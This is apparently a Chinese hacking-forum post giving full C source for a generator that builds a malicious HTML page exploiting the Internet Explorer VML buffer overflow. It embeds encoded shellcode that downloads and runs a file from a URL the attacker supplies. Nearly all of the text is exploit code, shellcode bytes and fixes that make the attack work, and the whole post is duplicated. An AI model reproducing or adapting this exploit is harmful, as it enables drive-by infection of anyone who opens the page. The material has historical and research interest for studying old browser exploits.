IE VML BufferOverflow Download&Exec Exploit 修改版

摘要

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:gyzy

所有代码都修改自 NOP 的模版,在此表示感谢。为方便大家研究写了个生成器,欢迎下载测试。NOP 在 milw0rm.com 上公布的代码有点小问题:填上自己的 shellcode,把第一个字节改成 \xCC 后,发现 shellcode 解码部分连续出现的三个 \xFF 中后面两个会被破坏(和以前的 Serv-U 溢出一样),所以在头部加入几个修正字节:
/* Fix-up that the write-up prepends to the shellcode: add 0xC0 to the byte at
 * [esp+0x2E] and 0xFF to the byte at [esp+0x2F].  These are exactly the first
 * ten bytes of sh4llcode below (80 44 24 2E C0 / 80 44 24 2F FF).  Per the
 * text they repair the two decoder bytes the overflow clobbers; which two
 * bytes of the buffer [esp+0x2E/0x2F] correspond to is not shown here. */
__asm{
add [esp+0x2E],0xC0
add [esp+0x2F],0xFF
}
重新测试,成功。测试环境Win2000 Professional SP4 + IE5.0

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "resource.h"

/* Output stream for the generated test.html; opened in create() and used by
 * convert2ncr() through this global rather than a parameter. */
FILE *fp = NULL;
/* Handle of the generator dialog, set in DialogProc() on WM_INITDIALOG. */
HWND hdlg;

/* Number of literal 'A' (0x41) characters create() writes before the
 * NCR-encoded overflow buffer. */
#define NOPSIZE 260
/* Not referenced anywhere in this listing; the URL length is bounded only by
 * the 256-byte buffer in DialogProc(). */
#define MAXURL 60

/* Return address that create() places at the start of the overflow buffer.
 * The comments say it is a `call esp`; the write-up says to pick it per OS
 * language version.  Which module 0x7800CCDD belongs to is not stated here. */
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

/* Forward declarations; both are defined later in this file. */
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam);
void create(char* url);

/* Search the shellcode for these fix-up bytes (add [esp+0x1A],0xC0 / add [esp+0x1B],0xFF);
   the sh4llcode array below uses offsets 0x2E/0x2F instead:
\x80\x44\x24\x1A\xC0
\x80\x44\x24\x1B\xFF
*/

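/*
 * Payload that create() embeds (as numeric character references) in the
 * generated page.  Layout, read off the opcode bytes:
 *   [0..9]   two `add byte ptr [esp+0x2E/0x2F], imm8` fix-ups
 *            (80 44 24 2E C0 / 80 44 24 2F FF), see the write-up above;
 *   [10..32] jmp/call/pop decoder: ecx = 0x13C (66 B9 3C 01), then
 *            `xor byte [edx+ecx], 0x99; loop` (80 34 0A 99 / E2 FA) over
 *            the 0x13C = 316 bytes that follow the call;
 *   [33..348] 316 bytes of 0x99-XOR-encoded payload (the remainder of the
 *            array).  The URL and 0x80 byte that create() appends after
 *            this array are outside the decoded region.
 * The page had lost its backslashes ("/x80"), which would have turned this
 * into plain ASCII text; the escapes are restored here.
 */
unsigned char sh4llcode[] =
"\x80\x44\x24\x2E\xC0\x80\x44\x24\x2F\xFF\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"
"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"
"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"
"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"
"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"
"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"
"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66"

"\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE"
"\xFC\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB"
"\xE0\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD"
"\xF1\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB"
"\xE0\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE"
"\xF7\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99";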

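/*
 * Opening half of the generated test.html: a VML <v:rect> whose
 * <v:fill method="..."> attribute is left open so create() can write the
 * padding and the NCR-encoded overflow buffer into it; footer closes it.
 * The page had lost its backslashes ("/n", "/""), which would not even
 * compile; the escapes are restored.  "v\\:*" yields the CSS selector v\:*.
 */
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";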

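/* Closing half of test.html: terminates the method="..." attribute opened in
 * header and closes the <v:rect>, <body> and <html> elements.  Backslashes
 * lost in the page ("/"", "/n") are restored. */
char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;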

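/*
 * Write size bytes of buf to the global fp as decimal numeric character
 * references, one reference per byte pair: bytes (lo, hi) become
 * "&#N;" with N = lo | hi << 8, i.e. a little-endian 16-bit unit.
 *
 * buf:  bytes to encode.  If size is odd the loop also reads buf[size], so
 *       the array must be at least one byte longer than size in that case
 *       (create() satisfies this with its 1024-byte, 0x90-filled buffer).
 * size: number of bytes to encode.
 *
 * fp must already be open; there is no NULL check (create() only calls this
 * after a successful fopen()).  The original printed the unsigned value with
 * %d; %u matches the argument type.
 */
void convert2ncr(unsigned char * buf, int size)
{
    for (int i = 0; i < size; i += 2)
    {
        unsigned int unit = ((unsigned int)buf[i + 1] << 8) | buf[i];
        fprintf(fp, "&#%u;", unit);
    }
}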

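/*
 * Generate test.html in the current directory: header, NOPSIZE literal 'A'
 * characters, then the overflow buffer as NCRs (convert2ncr), then footer.
 *
 * Overflow buffer layout (buf):
 *   [0..3]    ret (the call-esp address)
 *   [4..27]   24 bytes of 0x90 filler (psize starts at 4+8+0x10)
 *   then      sh4llcode, then url verbatim, then a single 0x80 byte.
 * This version does not XOR-encode the URL (compare the burl/0xEE remark at
 * the end of the write-up); it is copied as-is.
 *
 * url: NUL-terminated string; the caller (DialogProc) passes at most 255
 *      characters.  A URL that would not fit in buf is rejected, so the
 *      function cannot overflow buf for any caller.
 *
 * Failure (fopen error, URL too long) returns silently; DialogProc cannot
 * tell and still shows its "generated" message.  The original never closed
 * fp, leaking a handle per click; it is closed here and reset to NULL.
 */
void create(char* url)
{
    unsigned char buf[1024];
    const int sc_off = 4 + 8 + 0x10;            /* ret + 0x90 filler */
    const size_t sc_len = sizeof(sh4llcode) - 1;
    size_t url_len = strlen(url);
    int psize = 0;
    int i = 0;

    /* ret + filler + shellcode + url + 0x80 marker must fit in buf. */
    if (url_len > sizeof(buf) - sc_off - sc_len - 1)
    {
        return;
    }

    fp = fopen("test.html", "w+b");
    if (!fp)
    {
        return;
    }

    fputs(header, fp);
    fflush(fp);

    /* Literal 'A' padding before the NCR-encoded buffer. */
    for (i = 0; i < NOPSIZE; i++)
    {
        fputc('A', fp);
    }
    fflush(fp);

    /* Everything not explicitly written below stays 0x90, including the
     * byte convert2ncr() reads past psize when psize is odd. */
    memset(buf, 0x90, sizeof(buf));

    memcpy(buf, &ret, 4);
    psize = sc_off;

    memcpy(buf + psize, sh4llcode, sc_len);
    psize += (int)sc_len;

    memcpy(buf + psize, url, url_len);
    psize += (int)url_len;

    buf[psize++] = 0x80;

    convert2ncr(buf, psize);

    fputs(footer, fp);
    fflush(fp);

    fclose(fp);
    fp = NULL;
}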

/* Entry point: run the generator dialog (IDD_DIALOG1) modally, then exit 0.
 * hPrevInstance, lpCmdLine and nCmdShow are unused.  The resource id is
 * passed through an (LPCTSTR) cast as the original did (MAKEINTRESOURCE
 * would be the conventional spelling); DialogProc already has the DLGPROC
 * signature, so no cast is needed on it. */
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    DialogBox(hInstance, (LPCTSTR)IDD_DIALOG1, NULL, DialogProc);
    return 0;
}

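/*
 * Dialog procedure for IDD_DIALOG1.
 *   WM_INITDIALOG: stores the dialog handle in the global hdlg (kept for
 *                  compatibility; this handler now uses its hwndDlg
 *                  parameter instead of the global) and returns true.
 *   WM_COMMAND/IDOK:     reads the URL from IDC_EDIT1 into a 256-byte buffer
 *                  and calls create().  The success message is shown
 *                  unconditionally because create() does not report failure.
 *   WM_COMMAND/IDCANCEL: ends the dialog and posts WM_QUIT.
 * Every other message returns 0 (not handled).  lParam is unused.
 */
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
    switch (uMsg)
    {
    case WM_INITDIALOG:
        hdlg = hwndDlg;
        return true;

    case WM_COMMAND:
        if (LOWORD(wParam) == IDOK)
        {
            char url[256];
            ZeroMemory(url, sizeof url);
            GetDlgItemText(hwndDlg, IDC_EDIT1, url, sizeof url);
            create(url);
            MessageBox(hwndDlg,"恭喜,test.html已生成!","提示",MB_ICONINFORMATION);
        }
        else if (LOWORD(wParam) == IDCANCEL)
        {
            EndDialog(hwndDlg, LOWORD(wParam));
            PostQuitMessage(0);
        }
        break;

    default:
        break;
    }
    return 0;
}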
生成器下载:IEOverflow.rar

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:gyzy
IE VML BufferOverflow Download&Exec Exploit 修改版
所有代码都修改自 NOP 的模版,在此表示感谢。为方便大家研究写了个生成器,欢迎下载测试。NOP 在 milw0rm.com 上公布的代码有点小问题:填上自己的 shellcode,把第一个字节改成 \xCC 后,发现 shellcode 解码部分连续出现的三个 \xFF 中后面两个会被破坏(和以前的 Serv-U 溢出一样),所以在头部加入几个修正字节:
/* Fix-up that the write-up prepends to the shellcode: add 0xC0 to the byte at
 * [esp+0x2E] and 0xFF to the byte at [esp+0x2F].  These are exactly the first
 * ten bytes of sh4llcode below (80 44 24 2E C0 / 80 44 24 2F FF).  Per the
 * text they repair the two decoder bytes the overflow clobbers; which two
 * bytes of the buffer [esp+0x2E/0x2F] correspond to is not shown here. */
__asm{
add [esp+0x2E],0xC0
add [esp+0x2F],0xFF
}
重新测试,成功。测试环境Win2000 Professional SP4 + IE5.0

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "resource.h"

/* Output stream for the generated test.html; opened in create() and used by
 * convert2ncr() through this global rather than a parameter. */
FILE *fp = NULL;
/* Handle of the generator dialog, set in DialogProc() on WM_INITDIALOG. */
HWND hdlg;

/* Number of literal 'A' (0x41) characters create() writes before the
 * NCR-encoded overflow buffer. */
#define NOPSIZE 260
/* Not referenced anywhere in this listing; the URL length is bounded only by
 * the 256-byte buffer in DialogProc(). */
#define MAXURL 60

/* Return address that create() places at the start of the overflow buffer.
 * The comments say it is a `call esp`; the write-up says to pick it per OS
 * language version.  Which module 0x7800CCDD belongs to is not stated here. */
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

/* Forward declarations; both are defined later in this file. */
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam);
void create(char* url);

/* Search the shellcode for these fix-up bytes (add [esp+0x1A],0xC0 / add [esp+0x1B],0xFF);
   the sh4llcode array below uses offsets 0x2E/0x2F instead:
\x80\x44\x24\x1A\xC0
\x80\x44\x24\x1B\xFF
*/

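/*
 * Payload that create() embeds (as numeric character references) in the
 * generated page.  Layout, read off the opcode bytes:
 *   [0..9]   two `add byte ptr [esp+0x2E/0x2F], imm8` fix-ups
 *            (80 44 24 2E C0 / 80 44 24 2F FF), see the write-up above;
 *   [10..32] jmp/call/pop decoder: ecx = 0x13C (66 B9 3C 01), then
 *            `xor byte [edx+ecx], 0x99; loop` (80 34 0A 99 / E2 FA) over
 *            the 0x13C = 316 bytes that follow the call;
 *   [33..348] 316 bytes of 0x99-XOR-encoded payload (the remainder of the
 *            array).  The URL and 0x80 byte that create() appends after
 *            this array are outside the decoded region.
 * The page had lost its backslashes ("/x80"), which would have turned this
 * into plain ASCII text; the escapes are restored here.
 */
unsigned char sh4llcode[] =
"\x80\x44\x24\x2E\xC0\x80\x44\x24\x2F\xFF\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"
"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"
"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"
"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"
"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"
"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"
"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66"

"\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE"
"\xFC\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB"
"\xE0\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD"
"\xF1\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB"
"\xE0\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE"
"\xF7\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99";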

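/*
 * Opening half of the generated test.html: a VML <v:rect> whose
 * <v:fill method="..."> attribute is left open so create() can write the
 * padding and the NCR-encoded overflow buffer into it; footer closes it.
 * The page had lost its backslashes ("/n", "/""), which would not even
 * compile; the escapes are restored.  "v\\:*" yields the CSS selector v\:*.
 */
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";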

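/* Closing half of test.html: terminates the method="..." attribute opened in
 * header and closes the <v:rect>, <body> and <html> elements.  Backslashes
 * lost in the page ("/"", "/n") are restored. */
char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;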

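/*
 * Write size bytes of buf to the global fp as decimal numeric character
 * references, one reference per byte pair: bytes (lo, hi) become
 * "&#N;" with N = lo | hi << 8, i.e. a little-endian 16-bit unit.
 *
 * buf:  bytes to encode.  If size is odd the loop also reads buf[size], so
 *       the array must be at least one byte longer than size in that case
 *       (create() satisfies this with its 1024-byte, 0x90-filled buffer).
 * size: number of bytes to encode.
 *
 * fp must already be open; there is no NULL check (create() only calls this
 * after a successful fopen()).  The original printed the unsigned value with
 * %d; %u matches the argument type.
 */
void convert2ncr(unsigned char * buf, int size)
{
    for (int i = 0; i < size; i += 2)
    {
        unsigned int unit = ((unsigned int)buf[i + 1] << 8) | buf[i];
        fprintf(fp, "&#%u;", unit);
    }
}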

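/*
 * Generate test.html in the current directory: header, NOPSIZE literal 'A'
 * characters, then the overflow buffer as NCRs (convert2ncr), then footer.
 *
 * Overflow buffer layout (buf):
 *   [0..3]    ret (the call-esp address)
 *   [4..27]   24 bytes of 0x90 filler (psize starts at 4+8+0x10)
 *   then      sh4llcode, then url verbatim, then a single 0x80 byte.
 * This version does not XOR-encode the URL (compare the burl/0xEE remark at
 * the end of the write-up); it is copied as-is.
 *
 * url: NUL-terminated string; the caller (DialogProc) passes at most 255
 *      characters.  A URL that would not fit in buf is rejected, so the
 *      function cannot overflow buf for any caller.
 *
 * Failure (fopen error, URL too long) returns silently; DialogProc cannot
 * tell and still shows its "generated" message.  The original never closed
 * fp, leaking a handle per click; it is closed here and reset to NULL.
 */
void create(char* url)
{
    unsigned char buf[1024];
    const int sc_off = 4 + 8 + 0x10;            /* ret + 0x90 filler */
    const size_t sc_len = sizeof(sh4llcode) - 1;
    size_t url_len = strlen(url);
    int psize = 0;
    int i = 0;

    /* ret + filler + shellcode + url + 0x80 marker must fit in buf. */
    if (url_len > sizeof(buf) - sc_off - sc_len - 1)
    {
        return;
    }

    fp = fopen("test.html", "w+b");
    if (!fp)
    {
        return;
    }

    fputs(header, fp);
    fflush(fp);

    /* Literal 'A' padding before the NCR-encoded buffer. */
    for (i = 0; i < NOPSIZE; i++)
    {
        fputc('A', fp);
    }
    fflush(fp);

    /* Everything not explicitly written below stays 0x90, including the
     * byte convert2ncr() reads past psize when psize is odd. */
    memset(buf, 0x90, sizeof(buf));

    memcpy(buf, &ret, 4);
    psize = sc_off;

    memcpy(buf + psize, sh4llcode, sc_len);
    psize += (int)sc_len;

    memcpy(buf + psize, url, url_len);
    psize += (int)url_len;

    buf[psize++] = 0x80;

    convert2ncr(buf, psize);

    fputs(footer, fp);
    fflush(fp);

    fclose(fp);
    fp = NULL;
}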

/* Entry point: run the generator dialog (IDD_DIALOG1) modally, then exit 0.
 * hPrevInstance, lpCmdLine and nCmdShow are unused.  The resource id is
 * passed through an (LPCTSTR) cast as the original did (MAKEINTRESOURCE
 * would be the conventional spelling); DialogProc already has the DLGPROC
 * signature, so no cast is needed on it. */
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    DialogBox(hInstance, (LPCTSTR)IDD_DIALOG1, NULL, DialogProc);
    return 0;
}

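/*
 * Dialog procedure for IDD_DIALOG1.
 *   WM_INITDIALOG: stores the dialog handle in the global hdlg (kept for
 *                  compatibility; this handler now uses its hwndDlg
 *                  parameter instead of the global) and returns true.
 *   WM_COMMAND/IDOK:     reads the URL from IDC_EDIT1 into a 256-byte buffer
 *                  and calls create().  The success message is shown
 *                  unconditionally because create() does not report failure.
 *   WM_COMMAND/IDCANCEL: ends the dialog and posts WM_QUIT.
 * Every other message returns 0 (not handled).  lParam is unused.
 */
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
    switch (uMsg)
    {
    case WM_INITDIALOG:
        hdlg = hwndDlg;
        return true;

    case WM_COMMAND:
        if (LOWORD(wParam) == IDOK)
        {
            char url[256];
            ZeroMemory(url, sizeof url);
            GetDlgItemText(hwndDlg, IDC_EDIT1, url, sizeof url);
            create(url);
            MessageBox(hwndDlg,"恭喜,test.html已生成!","提示",MB_ICONINFORMATION);
        }
        else if (LOWORD(wParam) == IDCANCEL)
        {
            EndDialog(hwndDlg, LOWORD(wParam));
            PostQuitMessage(0);
        }
        break;

    default:
        break;
    }
    return 0;
}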

生成器下载:IEOverflow.rar

用户可以根据具体 OS 语言版本修改相应的 call esp / jmp esp 地址(即代码中的 ret 变量,注释标为 call esp)。
其实 NOP 公开的那个也是可用的,只不过他犯了个错误(可能是故意的),zhouzhen 兄也发现了:`burl[i] = buf[i] ^ 0xee;` 这句错了,应该是 `burl[i] = url[i] ^ 0xee;`。注意本文的 create() 并未对 URL 做 XOR 编码,而是把 URL 原样拷贝到 shellcode 之后,burl 数组未被使用。
